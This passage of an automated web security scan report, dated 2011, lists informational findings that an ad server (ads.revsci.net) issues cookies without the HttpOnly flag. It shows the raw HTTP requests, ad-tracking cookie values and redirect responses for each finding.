Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Uihs="MLsXr98vcS5joAD3Ramm7m1t+VG2u86F7odjMpPWFVoxB1SJLO0k7UGOYbbf8s8JwOo38i801L3UUpBivWyOp/577cI3mcnXAMS8oxiDDVp8H1BGXR3pIUBTO7FKrI7Km7BHstMovCk8DJLbgwN2wt/S3/iJ9f6MyG7GkFGqxvSem7K9r4yjmiQLUCCesqM4fw+vm8qLr7Pl6R55NhiwdK8AeGKycXRkK6kZZOOdtv9lCrPwX1hpNjhvRGV9wQXjWeXpq2LuHOSBArCH67JFEDRLnajtbNk3TMVytWT4Z4wi1GXZQb//Zfdfkj/gDfRRKLTWu9FT+q8awI+fnYB/OYTeMmZZOEqoB2TEOxgpmKNftUwnqldNqerushNz7sP1NAJwWHc3RbB+ptOuus8j9ey35j2110rTiRX28w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGYsK3+DY1l13C02rTIRBqQ2OYiHGvze9j90z9N83Xdojeb1YEtuFtjInUpdmlemjXlXYGda/XzQEydWdgrHQN7q3VqUbfIOKWrXlkTYsltuQI8qsrJ2srKwKzN0Z0jMjqK585ynCYNVBi2GG3GdLN6NcUgYQs1Lspv8+3ieiZRxamLFOMb90Wvul5zWvyY11S1DyTuvYjqSYxDegoCowgeBBAG7+Xf6gDVV2QPzWFHYpGlYl3P4ZX9CpI+vgLYBPxtTTKVwIUl10sBi/44VOSWRq1H76DFQxw4mb75x/5h13Vj0wCTGJjg7TaZoA4M6vWoTrIQuQtCdyjKRdfs/I5MBHJtw2LW7PqooQ/iC6GOaO7hnD53acPYEykGdbLM6NJMcS9nKJvJsxcM+1WzrEtX+Cbxv1yl+5/H2aqQXy3rE21OIbQG0Txff9Q6+QE4SRR2rr8yhSPM3oIfcBF/T5SCBT9xRQBi+EOsjbUOlrkD/R1gThqaHXoloO+cDpDWYMdqMr2m82XWUceApd540S2Jzb5dkP1yq0s2L+ysv93dxCG9MV8zDAMz2B/owKqEvNjijXT0lUoyMHEc7PYlC/UHPRjdNEbjfsyU3vHiIPcHm2URkNHlZEiJTsz3JNnyi9NMRQSIatUASNyRzzhCImJqFxMUe9tdOjnlPjgGMtp5D+wc6ngXj5Iuz2lpF9rGuXDTDcTWp2NQU+nbFujm8qqTy6ResY3hsjgQijnWwjJB5j5LitAMxrk4fIjbcsHnW99MOBjiwVC9IOjc4cv6I/wm3tLiNhIBPThtOxWjcdljVM6n7CXuYaexrvdo06GoF3KEx44vkVU3TGis/Y96/swQJZXEHrZP11kChpj/b/jCI0sM00hIWy3sXVjyzG51eCP+KiXsOLcBCnQDPBwU+ZxZblipsN3CjeXYELsPCPWQMtJq/E2S/tGoB9YPYzU4FYs+9UtKa7cuKAFa576O/fMh9uP1/6zhP4EZBmhu0JXmu+j9eYoBao="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:35 GMT


18.197. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPYB1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0uRB="MLsXr98vcS5joAC3camm7m2LoDlezxNylzFx7q/7jh3vp9AaQ0d9+4VlvUgGPKQSVQ0KcSykIsBNoGXZdCAjuytlySGQ8/OftgBmlbDwxFXRsomko1dhpOEfNP9MWs6AJTpJGx4KVi3NyPLg6Ty1pZmBPol2v9eYT5WRqRvcf4u7txMu41iZYICzca0HKhAQnwG5+txYSjJVizEkhHghBeBMejkXDWkFVpZFcJOam5H6TC/Tk1UQDlT2PROx4nyyaEMjdDmLFNf1MZpXO9+vMJzhD7J7mRXm6jp5YWVv1nqFetXyeSI7ZLD/HSjFMKINO4FJgacxXDy5cV+HgtmUtTj0WAtVBJbk2nr4A7CJzwfNMNhtayL1bGn7HiJkIFLdmtlcSukRVDvh+KeaKP5f8TgfTiH6y91un+b23Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soH0f//DC7T+Ic8+Pr1nwUVevtCuE5/4IrgrPwDhQFpkUH9FP70YBKszuOe3UntXFMcTHLwgRLgVdrk3Un+lJZ/5e0yGlLruWUfqFPMt4Ra0+I8MJVwu20bf9vn4fQdGiwg6WnLAVuwjfo+LLfaow047Iln7+U+3J6ljUNMRuOkdO+Mn/yv8Ph4raozqmp2KbF/M/a1XxqebKzuxmu8P4iJRDp1Ntv4/dIGw9D2DMN9PwOraB87GBl1xM1/boOivuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFc9G1/w0gmA6W6SqbcuheULZwHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2TFYggAzs+RZG0d0XDMaGcg3JqM/wuDWn6Wub0A/DucMtOeFRNXtMWW31c4nOqAAjGb6dEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSztR6DyjuvmxCgsa46ly8aszaWZYZJmTuIQbm69sfr5mW3/PK3SvJi6DXR0PMaJsaqJ5q9fCF3PFxL8LFhHm80FFGihrqbvB3bQHHLhlk8d2VR8SeYammYKxZevEfy1KHOMBa3YpJ2lN0Opstz27gxRQgqs/InUyx+li/d9t9KwaSz3VOxH0Ri4Yywxr7Ig6qmMk9xXzakMFVw4BGQRcMBBazm2cBmuu8nKUZKWJqXd5gkwvN2O+FhcMNi6UqYZEdlhfVc9wXJMhMgKs6B4oTJPFt6VptUoFNcs35hRw4EbB8HodfVeMO1nV/ce9raL2Krjq29xAZ/HV9fbmMqTnC0kkaMMPeIJ5jGritmycpL6Y9Y5aJbbmSj7WiK4jex59VdY8bmG18R7EK55Y9XONQd8/87mj2Com+PLwweMLwYNe5Gp3WWG5eIx0v8yJwjPizFzH5yT7Gz7hpI4/A90CViAXPC38wcaxfRCbbbXW9kJ1bot+CMUBQUZbSZUiCeNUh9IFhoqHhTFLLH6caSwzmpmqVNHQI9uZrOUh8WjlexA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:37 GMT


18.198. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_f0-W="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVa5tqbfn/gBxYTeR02M2pSI8HR/ZfycAkbv/sDi9oySDDVp8H1BGXR3mIUBTO7FKiNbMke6vxBxCHU3H1o3TjA9xAN/W2fhrOqqGOw8C0qJAVmkXkdeVE7e0ejAJJ6HYYr7xC6Td58SGhALqjGJZwEN75CrLUsT4+Hzl5viSAFnI10jBinOo8ffl6vFjB/o0L1JNa/08FxWUp4CjxpsDaYpsY4Am5miDNP1KfB4UPjRwpkqxQ7FuRkQUKXgs11CqcjjGVzv3rkYig4aSw8VHmZ9t2ZFq2vFiY7rz2Ih8eifoUijie6EymXBguDwcPA4SNFV/B3bqofNbcpLSklSaW8DaoITTktjus8RrWDX2Zw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
